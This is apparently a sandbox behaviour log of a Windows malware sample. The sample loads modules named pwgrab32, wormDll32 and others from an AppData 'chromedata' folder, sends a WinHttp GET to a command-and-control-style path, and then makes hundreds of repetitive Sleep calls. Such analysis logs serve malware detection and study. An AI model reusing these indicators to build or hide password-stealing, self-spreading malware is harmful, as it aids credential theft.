	[0256.843] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.843] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0256.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ce78
	[0256.843] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x21ce78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0256.844] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.844] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.844] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.844] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0256.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ce78
	[0256.844] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x21ce78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0256.844] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.844] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.844] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.844] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0256.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ce78
	[0256.844] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x21ce78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0256.844] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.844] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.844] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.845] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0256.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ce78
	[0256.845] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x21ce78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0256.845] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.845] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.845] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.845] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0256.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ce78
	[0256.845] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x21ce78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0256.845] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.845] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.845] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.845] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0256.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21ce78
	[0256.845] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x21ce78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0256.845] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c
	[0256.845] GetFileTime (in: hFile=0x66c, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.846] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x80b35080, dwHighDateTime=0x1d50a6a)) 
	[0256.846] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0256.846] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0256.846] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/h0Je0MfwGdtFWsDZrEa/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0256.846] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0256.846] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) 

Thread:
	id = 130
	os_tid = 0x28c


Thread:
	id = 131
	os_tid = 0x2ac


Thread:
	id = 132
	os_tid = 0x348


Thread:
	id = 133
	os_tid = 0x120


Thread:
	id = 135
	os_tid = 0x930


Thread:
	id = 137
	os_tid = 0x174


Thread:
	id = 151
	os_tid = 0x990


Thread:
	id = 152
	os_tid = 0x9e4

	[0103.062] Sleep (dwMilliseconds=0xbb8) 
	[0106.065] Sleep (dwMilliseconds=0xbb8) 
	[0109.076] Sleep (dwMilliseconds=0xbb8) 
	[0112.095] Sleep (dwMilliseconds=0xbb8) 
	[0115.099] Sleep (dwMilliseconds=0xbb8) 
	[0118.108] Sleep (dwMilliseconds=0xbb8) 
	[0121.119] Sleep (dwMilliseconds=0xbb8) 
	[0124.130] Sleep (dwMilliseconds=0xbb8) 
	[0127.141] Sleep (dwMilliseconds=0xbb8) 
	[0130.152] Sleep (dwMilliseconds=0xbb8) 
	[0133.162] Sleep (dwMilliseconds=0xbb8) 
	[0133.178] Sleep (dwMilliseconds=0xbb8) 
	[0133.209] Sleep (dwMilliseconds=0xbb8) 
	[0133.225] Sleep (dwMilliseconds=0xbb8) 
	[0133.241] Sleep (dwMilliseconds=0xbb8) 
	[0133.257] Sleep (dwMilliseconds=0xbb8) 
	[0133.273] Sleep (dwMilliseconds=0xbb8) 
	[0133.288] Sleep (dwMilliseconds=0xbb8) 
	[0133.303] Sleep (dwMilliseconds=0xbb8) 
	[0133.319] Sleep (dwMilliseconds=0xbb8) 
	[0133.350] Sleep (dwMilliseconds=0xbb8) 
	[0133.367] Sleep (dwMilliseconds=0xbb8) 
	[0133.381] Sleep (dwMilliseconds=0xbb8) 
	[0133.396] Sleep (dwMilliseconds=0xbb8) 
	[0133.412] Sleep (dwMilliseconds=0xbb8) 
	[0133.428] Sleep (dwMilliseconds=0xbb8) 
	[0133.443] Sleep (dwMilliseconds=0xbb8) 
	[0133.459] Sleep (dwMilliseconds=0xbb8) 
	[0133.475] Sleep (dwMilliseconds=0xbb8) 
	[0133.490] Sleep (dwMilliseconds=0xbb8) 
	[0133.506] Sleep (dwMilliseconds=0xbb8) 
	[0133.521] Sleep (dwMilliseconds=0xbb8) 
	[0133.537] Sleep (dwMilliseconds=0xbb8) 
	[0133.554] Sleep (dwMilliseconds=0xbb8) 
	[0133.569] Sleep (dwMilliseconds=0xbb8) 
	[0133.584] Sleep (dwMilliseconds=0xbb8) 
	[0133.599] Sleep (dwMilliseconds=0xbb8) 
	[0133.615] Sleep (dwMilliseconds=0xbb8) 
	[0133.630] Sleep (dwMilliseconds=0xbb8) 
	[0133.659] Sleep (dwMilliseconds=0xbb8) 
	[0133.662] Sleep (dwMilliseconds=0xbb8) 
	[0133.677] Sleep (dwMilliseconds=0xbb8) 
	[0133.693] Sleep (dwMilliseconds=0xbb8) 
	[0133.708] Sleep (dwMilliseconds=0xbb8) 
	[0133.724] Sleep (dwMilliseconds=0xbb8) 
	[0133.739] Sleep (dwMilliseconds=0xbb8) 
	[0133.755] Sleep (dwMilliseconds=0xbb8) 
	[0133.771] Sleep (dwMilliseconds=0xbb8) 
	[0133.787] Sleep (dwMilliseconds=0xbb8) 
	[0133.802] Sleep (dwMilliseconds=0xbb8) 
	[0133.818] Sleep (dwMilliseconds=0xbb8) 
	[0133.834] Sleep (dwMilliseconds=0xbb8) 
	[0133.849] Sleep (dwMilliseconds=0xbb8) 
	[0133.864] Sleep (dwMilliseconds=0xbb8) 
	[0133.880] Sleep (dwMilliseconds=0xbb8) 
	[0133.896] Sleep (dwMilliseconds=0xbb8) 
	[0133.911] Sleep (dwMilliseconds=0xbb8) 
	[0133.927] Sleep (dwMilliseconds=0xbb8) 
	[0133.942] Sleep (dwMilliseconds=0xbb8) 
	[0133.958] Sleep (dwMilliseconds=0xbb8) 
	[0133.974] Sleep (dwMilliseconds=0xbb8) 
	[0133.989] Sleep (dwMilliseconds=0xbb8) 
	[0134.005] Sleep (dwMilliseconds=0xbb8) 
	[0134.020] Sleep (dwMilliseconds=0xbb8) 
	[0134.039] Sleep (dwMilliseconds=0xbb8) 
	[0134.052] Sleep (dwMilliseconds=0xbb8) 
	[0134.068] Sleep (dwMilliseconds=0xbb8) 
	[0134.083] Sleep (dwMilliseconds=0xbb8) 
	[0134.098] Sleep (dwMilliseconds=0xbb8) 
	[0134.115] Sleep (dwMilliseconds=0xbb8) 
	[0134.130] Sleep (dwMilliseconds=0xbb8) 
	[0134.145] Sleep (dwMilliseconds=0xbb8) 
	[0134.161] Sleep (dwMilliseconds=0xbb8) 
	[0134.176] Sleep (dwMilliseconds=0xbb8) 
	[0134.199] Sleep (dwMilliseconds=0xbb8) 
	[0134.208] Sleep (dwMilliseconds=0xbb8) 
	[0134.223] Sleep (dwMilliseconds=0xbb8) 
	[0134.239] Sleep (dwMilliseconds=0xbb8) 
	[0134.254] Sleep (dwMilliseconds=0xbb8) 
	[0134.270] Sleep (dwMilliseconds=0xbb8) 
	[0134.286] Sleep (dwMilliseconds=0xbb8) 
	[0134.301] Sleep (dwMilliseconds=0xbb8) 
	[0134.317] Sleep (dwMilliseconds=0xbb8) 
	[0134.333] Sleep (dwMilliseconds=0xbb8) 
	[0134.349] Sleep (dwMilliseconds=0xbb8) 
	[0134.363] Sleep (dwMilliseconds=0xbb8) 
	[0134.379] Sleep (dwMilliseconds=0xbb8) 
	[0134.395] Sleep (dwMilliseconds=0xbb8) 
	[0134.410] Sleep (dwMilliseconds=0xbb8) 
	[0134.426] Sleep (dwMilliseconds=0xbb8) 
	[0134.442] Sleep (dwMilliseconds=0xbb8) 
	[0134.457] Sleep (dwMilliseconds=0xbb8) 
	[0134.473] Sleep (dwMilliseconds=0xbb8) 
	[0134.488] Sleep (dwMilliseconds=0xbb8) 
	[0134.504] Sleep (dwMilliseconds=0xbb8) 
	[0134.520] Sleep (dwMilliseconds=0xbb8) 
	[0134.535] Sleep (dwMilliseconds=0xbb8) 
	[0134.551] Sleep (dwMilliseconds=0xbb8) 
	[0134.566] Sleep (dwMilliseconds=0xbb8) 
	[0134.582] Sleep (dwMilliseconds=0xbb8) 
	[0134.597] Sleep (dwMilliseconds=0xbb8) 
	[0134.616] Sleep (dwMilliseconds=0xbb8) 
	[0134.629] Sleep (dwMilliseconds=0xbb8) 
	[0134.653] Sleep (dwMilliseconds=0xbb8) 
	[0134.660] Sleep (dwMilliseconds=0xbb8) 
	[0134.677] Sleep (dwMilliseconds=0xbb8) 
	[0134.691] Sleep (dwMilliseconds=0xbb8) 
	[0134.707] Sleep (dwMilliseconds=0xbb8) 
	[0134.723] Sleep (dwMilliseconds=0xbb8) 
	[0134.738] Sleep (dwMilliseconds=0xbb8) 
	[0134.754] Sleep (dwMilliseconds=0xbb8) 
	[0134.772] Sleep (dwMilliseconds=0xbb8) 
	[0134.785] Sleep (dwMilliseconds=0xbb8) 
	[0134.800] Sleep (dwMilliseconds=0xbb8) 
	[0134.816] Sleep (dwMilliseconds=0xbb8) 
	[0134.832] Sleep (dwMilliseconds=0xbb8) 
	[0134.848] Sleep (dwMilliseconds=0xbb8) 
	[0134.863] Sleep (dwMilliseconds=0xbb8) 
	[0134.878] Sleep (dwMilliseconds=0xbb8) 
	[0134.894] Sleep (dwMilliseconds=0xbb8) 
	[0134.910] Sleep (dwMilliseconds=0xbb8) 
	[0134.925] Sleep (dwMilliseconds=0xbb8) 
	[0134.941] Sleep (dwMilliseconds=0xbb8) 
	[0134.956] Sleep (dwMilliseconds=0xbb8) 
	[0134.973] Sleep (dwMilliseconds=0xbb8) 
	[0134.991] Sleep (dwMilliseconds=0xbb8) 
	[0135.003] Sleep (dwMilliseconds=0xbb8) 
	[0135.019] Sleep (dwMilliseconds=0xbb8) 
	[0135.036] Sleep (dwMilliseconds=0xbb8) 
	[0135.050] Sleep (dwMilliseconds=0xbb8) 
	[0135.066] Sleep (dwMilliseconds=0xbb8) 
	[0135.082] Sleep (dwMilliseconds=0xbb8) 
	[0135.097] Sleep (dwMilliseconds=0xbb8) 
	[0135.115] Sleep (dwMilliseconds=0xbb8) 
	[0135.128] Sleep (dwMilliseconds=0xbb8) 
	[0135.144] Sleep (dwMilliseconds=0xbb8) 
	[0135.159] Sleep (dwMilliseconds=0xbb8) 
	[0135.175] Sleep (dwMilliseconds=0xbb8) 
	[0135.191] Sleep (dwMilliseconds=0xbb8) 
	[0135.226] Sleep (dwMilliseconds=0xbb8) 
	[0135.237] Sleep (dwMilliseconds=0xbb8) 
	[0135.253] Sleep (dwMilliseconds=0xbb8) 
	[0135.268] Sleep (dwMilliseconds=0xbb8) 
	[0135.284] Sleep (dwMilliseconds=0xbb8) 
	[0135.300] Sleep (dwMilliseconds=0xbb8) 
	[0135.315] Sleep (dwMilliseconds=0xbb8) 
	[0135.331] Sleep (dwMilliseconds=0xbb8) 
	[0135.357] Sleep (dwMilliseconds=0xbb8) 
	[0135.362] Sleep (dwMilliseconds=0xbb8) 
	[0135.377] Sleep (dwMilliseconds=0xbb8) 
	[0135.393] Sleep (dwMilliseconds=0xbb8) 
	[0135.409] Sleep (dwMilliseconds=0xbb8) 
	[0135.424] Sleep (dwMilliseconds=0xbb8) 
	[0135.440] Sleep (dwMilliseconds=0xbb8) 
	[0135.455] Sleep (dwMilliseconds=0xbb8) 
	[0135.471] Sleep (dwMilliseconds=0xbb8) 
	[0135.487] Sleep (dwMilliseconds=0xbb8) 
	[0135.502] Sleep (dwMilliseconds=0xbb8) 
	[0135.519] Sleep (dwMilliseconds=0xbb8) 
	[0135.534] Sleep (dwMilliseconds=0xbb8) 
	[0135.549] Sleep (dwMilliseconds=0xbb8) 
	[0135.565] Sleep (dwMilliseconds=0xbb8) 
	[0135.580] Sleep (dwMilliseconds=0xbb8) 
	[0135.596] Sleep (dwMilliseconds=0xbb8) 
	[0135.612] Sleep (dwMilliseconds=0xbb8) 
	[0135.627] Sleep (dwMilliseconds=0xbb8) 
	[0135.656] Sleep (dwMilliseconds=0xbb8) 
	[0135.658] Sleep (dwMilliseconds=0xbb8) 
	[0135.674] Sleep (dwMilliseconds=0xbb8) 
	[0135.689] Sleep (dwMilliseconds=0xbb8) 
	[0135.705] Sleep (dwMilliseconds=0xbb8) 
	[0135.721] Sleep (dwMilliseconds=0xbb8) 
	[0135.737] Sleep (dwMilliseconds=0xbb8) 
	[0135.752] Sleep (dwMilliseconds=0xbb8) 
	[0135.768] Sleep (dwMilliseconds=0xbb8) 
	[0135.786] Sleep (dwMilliseconds=0xbb8) 
	[0135.799] Sleep (dwMilliseconds=0xbb8) 
	[0135.814] Sleep (dwMilliseconds=0xbb8) 
	[0135.831] Sleep (dwMilliseconds=0xbb8) 
	[0135.846] Sleep (dwMilliseconds=0xbb8) 
	[0135.861] Sleep (dwMilliseconds=0xbb8) 
	[0135.877] Sleep (dwMilliseconds=0xbb8) 
	[0135.892] Sleep (dwMilliseconds=0xbb8) 
	[0135.911] Sleep (dwMilliseconds=0xbb8) 
	[0135.924] Sleep (dwMilliseconds=0xbb8) 
	[0135.939] Sleep (dwMilliseconds=0xbb8) 
	[0135.956] Sleep (dwMilliseconds=0xbb8) 
	[0135.971] Sleep (dwMilliseconds=0xbb8) 
	[0135.987] Sleep (dwMilliseconds=0xbb8) 
	[0136.002] Sleep (dwMilliseconds=0xbb8) 
	[0136.017] Sleep (dwMilliseconds=0xbb8) 
	[0136.033] Sleep (dwMilliseconds=0xbb8) 
	[0136.049] Sleep (dwMilliseconds=0xbb8) 
	[0136.067] Sleep (dwMilliseconds=0xbb8) 
	[0136.080] Sleep (dwMilliseconds=0xbb8) 
	[0136.095] Sleep (dwMilliseconds=0xbb8) 
	[0136.111] Sleep (dwMilliseconds=0xbb8) 
	[0136.126] Sleep (dwMilliseconds=0xbb8) 
	[0136.142] Sleep (dwMilliseconds=0xbb8) 
	[0136.158] Sleep (dwMilliseconds=0xbb8) 
	[0136.174] Sleep (dwMilliseconds=0xbb8) 
	[0136.192] Sleep (dwMilliseconds=0xbb8) 
	[0136.213] Sleep (dwMilliseconds=0xbb8) 
	[0136.220] Sleep (dwMilliseconds=0xbb8) 
	[0136.236] Sleep (dwMilliseconds=0xbb8) 
	[0136.251] Sleep (dwMilliseconds=0xbb8) 
	[0136.267] Sleep (dwMilliseconds=0xbb8) 
	[0136.283] Sleep (dwMilliseconds=0xbb8) 
	[0136.299] Sleep (dwMilliseconds=0xbb8) 
	[0136.314] Sleep (dwMilliseconds=0xbb8) 
	[0136.329] Sleep (dwMilliseconds=0xbb8) 
	[0136.346] Sleep (dwMilliseconds=0xbb8) 
	[0136.361] Sleep (dwMilliseconds=0xbb8) 
	[0136.376] Sleep (dwMilliseconds=0xbb8) 
	[0136.392] Sleep (dwMilliseconds=0xbb8) 
	[0136.408] Sleep (dwMilliseconds=0xbb8) 
	[0136.423] Sleep (dwMilliseconds=0xbb8) 
	[0136.438] Sleep (dwMilliseconds=0xbb8) 
	[0136.454] Sleep (dwMilliseconds=0xbb8) 
	[0136.470] Sleep (dwMilliseconds=0xbb8) 
	[0136.496] Sleep (dwMilliseconds=0xbb8) 
	[0136.501] Sleep (dwMilliseconds=0xbb8) 
	[0136.516] Sleep (dwMilliseconds=0xbb8) 
	[0136.533] Sleep (dwMilliseconds=0xbb8) 
	[0136.548] Sleep (dwMilliseconds=0xbb8) 
	[0136.563] Sleep (dwMilliseconds=0xbb8) 
	[0136.579] Sleep (dwMilliseconds=0xbb8) 
	[0136.595] Sleep (dwMilliseconds=0xbb8) 
	[0136.613] Sleep (dwMilliseconds=0xbb8) 
	[0136.626] Sleep (dwMilliseconds=0xbb8) 
	[0136.658] Sleep (dwMilliseconds=0xbb8) 
	[0136.673] Sleep (dwMilliseconds=0xbb8) 
	[0136.688] Sleep (dwMilliseconds=0xbb8) 
	[0136.704] Sleep (dwMilliseconds=0xbb8) 
	[0136.719] Sleep (dwMilliseconds=0xbb8) 
	[0136.735] Sleep (dwMilliseconds=0xbb8) 
	[0136.750] Sleep (dwMilliseconds=0xbb8) 
	[0136.766] Sleep (dwMilliseconds=0xbb8) 
	[0136.782] Sleep (dwMilliseconds=0xbb8) 
	[0136.797] Sleep (dwMilliseconds=0xbb8) 
	[0136.814] Sleep (dwMilliseconds=0xbb8) 
	[0136.832] Sleep (dwMilliseconds=0xbb8) 
	[0136.845] Sleep (dwMilliseconds=0xbb8) 
	[0136.860] Sleep (dwMilliseconds=0xbb8) 
	[0136.875] Sleep (dwMilliseconds=0xbb8) 
	[0136.891] Sleep (dwMilliseconds=0xbb8) 
	[0136.907] Sleep (dwMilliseconds=0xbb8) 
	[0136.923] Sleep (dwMilliseconds=0xbb8) 
	[0136.940] Sleep (dwMilliseconds=0xbb8) 
	[0136.953] Sleep (dwMilliseconds=0xbb8) 
	[0136.969] Sleep (dwMilliseconds=0xbb8) 
	[0136.984] Sleep (dwMilliseconds=0xbb8) 
	[0137.000] Sleep (dwMilliseconds=0xbb8) 
	[0137.016] Sleep (dwMilliseconds=0xbb8) 
	[0137.031] Sleep (dwMilliseconds=0xbb8) 
	[0137.047] Sleep (dwMilliseconds=0xbb8) 
	[0137.062] Sleep (dwMilliseconds=0xbb8) 
	[0137.078] Sleep (dwMilliseconds=0xbb8) 
	[0137.098] Sleep (dwMilliseconds=0xbb8) 
	[0137.109] Sleep (dwMilliseconds=0xbb8) 
	[0137.125] Sleep (dwMilliseconds=0xbb8) 
	[0137.145] Sleep (dwMilliseconds=0xbb8) 
	[0137.156] Sleep (dwMilliseconds=0xbb8) 
	[0137.172] Sleep (dwMilliseconds=0xbb8) 
	[0137.187] Sleep (dwMilliseconds=0xbb8) 
	[0137.203] Sleep (dwMilliseconds=0xbb8) 
	[0137.230] Sleep (dwMilliseconds=0xbb8) 
	[0137.234] Sleep (dwMilliseconds=0xbb8) 
	[0137.250] Sleep (dwMilliseconds=0xbb8) 
	[0137.265] Sleep (dwMilliseconds=0xbb8) 
	[0137.281] Sleep (dwMilliseconds=0xbb8) 
	[0137.296] Sleep (dwMilliseconds=0xbb8) 
	[0137.312] Sleep (dwMilliseconds=0xbb8) 
	[0137.328] Sleep (dwMilliseconds=0xbb8) 
	[0137.343] Sleep (dwMilliseconds=0xbb8) 
	[0137.375] Sleep (dwMilliseconds=0xbb8) 
	[0137.390] Sleep (dwMilliseconds=0xbb8) 
	[0137.405] Sleep (dwMilliseconds=0xbb8) 
	[0137.421] Sleep (dwMilliseconds=0xbb8) 
	[0137.437] Sleep (dwMilliseconds=0xbb8) 
	[0137.452] Sleep (dwMilliseconds=0xbb8) 
	[0137.470] Sleep (dwMilliseconds=0xbb8) 
	[0137.484] Sleep (dwMilliseconds=0xbb8) 
	[0137.499] Sleep (dwMilliseconds=0xbb8) 
	[0137.515] Sleep (dwMilliseconds=0xbb8) 
	[0137.531] Sleep (dwMilliseconds=0xbb8) 
	[0137.547] Sleep (dwMilliseconds=0xbb8) 
	[0137.562] Sleep (dwMilliseconds=0xbb8) 
	[0137.577] Sleep (dwMilliseconds=0xbb8) 
	[0137.593] Sleep (dwMilliseconds=0xbb8) 
	[0137.608] Sleep (dwMilliseconds=0xbb8) 
	[0137.624] Sleep (dwMilliseconds=0xbb8) 
	[0137.642] Sleep (dwMilliseconds=0xbb8) 
	[0137.702] Sleep (dwMilliseconds=0xbb8) 
	[0137.719] Sleep (dwMilliseconds=0xbb8) 
	[0137.733] Sleep (dwMilliseconds=0xbb8) 
	[0137.752] Sleep (dwMilliseconds=0xbb8) 
	[0137.764] Sleep (dwMilliseconds=0xbb8) 
	[0137.780] Sleep (dwMilliseconds=0xbb8) 
	[0137.795] Sleep (dwMilliseconds=0xbb8) 
	[0137.812] Sleep (dwMilliseconds=0xbb8) 
	[0137.827] Sleep (dwMilliseconds=0xbb8) 
	[0137.843] Sleep (dwMilliseconds=0xbb8) 
	[0137.858] Sleep (dwMilliseconds=0xbb8) 
	[0137.874] Sleep (dwMilliseconds=0xbb8) 
	[0137.889] Sleep (dwMilliseconds=0xbb8) 
	[0137.905] Sleep (dwMilliseconds=0xbb8) 
	[0137.921] Sleep (dwMilliseconds=0xbb8) 
	[0137.936] Sleep (dwMilliseconds=0xbb8) 
	[0137.952] Sleep (dwMilliseconds=0xbb8) 
	[0137.967] Sleep (dwMilliseconds=0xbb8) 
	[0137.983] Sleep (dwMilliseconds=0xbb8) 
	[0137.998] Sleep (dwMilliseconds=0xbb8) 
	[0138.014] Sleep (dwMilliseconds=0xbb8) 
	[0138.030] Sleep (dwMilliseconds=0xbb8) 
	[0138.045] Sleep (dwMilliseconds=0xbb8) 
